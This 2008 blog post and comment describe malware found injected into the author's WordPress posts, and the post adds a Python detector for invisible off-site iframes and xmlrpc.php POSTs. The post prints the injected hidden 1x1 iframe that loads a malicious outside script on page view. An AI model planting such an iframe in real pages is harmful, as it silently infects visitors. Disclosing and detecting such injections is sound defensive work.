Dellanave

Nice Exploit Code I Found in my Wordpress

Posted March 10th, 2008 by david & filed under Blog, Code, SEM, SEO, Tech.

I was going through some old posts just now, and discovered this little treat embedded in a post:

<!-- Traffic Statistics -->
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

The code it loads (I know it doesn’t wrap; I don’t really care) has been deleted from this post. Thanks to Mike Peters for the follow-up in the comments:

This code got sql injected into your wp_posts.

Make sure you upgrade to the 2.3.2 version of WordPress:

http://wordpress.org/support/topic/151888

What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.

Look for something like this in your server logs -

200.216.67.181 - - [28/Jan/2008:13:10:54 -0500] "POST /xmlrpc.php HTTP/1.0"

Once you view the post, you’re infected – the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up.

Someone with more patience than myself will probably take the time to disassemble that.

To find the post titles in your blog that might be affected, in SQL do:

mysql> select post_title from wp_posts where post_content like '%Statistics%';
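Matching on the word "Statistics" only catches this particular payload; the shape of the injection (an invisible iframe pointing off-site) is the more durable thing to look for, and the xmlrpc.php POSTs Mike mentions are the thing to look for in the logs. The following Python is an added example, not code from the original post: it scans constructed wp_posts rows for such iframes and pulls POST /xmlrpc.php entries out of constructed Apache-style log lines; the sample rows, the sample log and the 203.0.113.7 address are made up for the demonstration.

```python
import re
from html.parser import HTMLParser

# Constructed stand-ins for (post_title, post_content) rows from wp_posts.
SAMPLE_POSTS = [
    ("Clean post", '<p>Some text and <img src="/wp-content/uploads/a.png"></p>'),
    ("Injected post", "<p>Hello</p>\n<!-- Traffic Statistics -->\n"
     "<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php "
     "width=1 height=1 frameborder=0></iframe>\n<!-- End Traffic Statistics -->"),
]
# Constructed Apache-style access log lines (203.0.113.7 is a documentation address).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2008:13:09:01 -0500] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [28/Jan/2008:13:10:54 -0500] "POST /xmlrpc.php HTTP/1.0" 200 412
10.0.0.5 - - [28/Jan/2008:13:11:20 -0500] "GET /xmlrpc.php HTTP/1.1" 200 42
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe>; unquoted values like src=http://... are handled."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))

def suspicious_iframes(post_content):
    """Return the src of each iframe that is effectively invisible (0 or 1 px) and off-site."""
    parser = IframeCollector()
    parser.feed(post_content)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        if tiny and src.lower().startswith(("http://", "https://")):
            hits.append(src)
    return hits

def flag_posts(rows):
    """Return [(post_title, [src, ...])] for every row carrying a suspicious iframe."""
    return [(title, hits) for title, body in rows if (hits := suspicious_iframes(body))]

def xmlrpc_posts(log_text):
    """Return (ip, timestamp) for each POST to xmlrpc.php; plain GETs are usually only probes."""
    matches = (LOG_RE.match(line) for line in log_text.splitlines())
    return [(m["ip"], m["ts"]) for m in matches
            if m and m["method"] == "POST" and m["path"].startswith("/xmlrpc.php")]
```

On a real site, feed `flag_posts` the rows from `select post_title, post_content from wp_posts` and `xmlrpc_posts` the access log, then compare the timestamps of the POSTs with the `post_modified` column of the flagged rows.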


Posted by: David Dellanave


6 Responses to “Nice Exploit Code I Found in my Wordpress”

Mike Peters | March 11th, 2008 at 8:42 am

This code got sql injected into your wp_posts.

Make sure you upgrade to the 2.3.2 version of WordPress:
http://wordpress.org/support/topic/151888

What it does is attempt to install a VBS malware on your machine using an xmlrpc exploit in older versions of WordPress.

Look for something like this in your server logs -

200.216.67.181 - - [28/Jan/2008:13:10:54 -0500] "POST /xmlrpc.php HTTP/1.0"

Once you view the post, you’re infected – the VBS code will be installed and you’re going to need to run NOD32 or AVG to clean it up.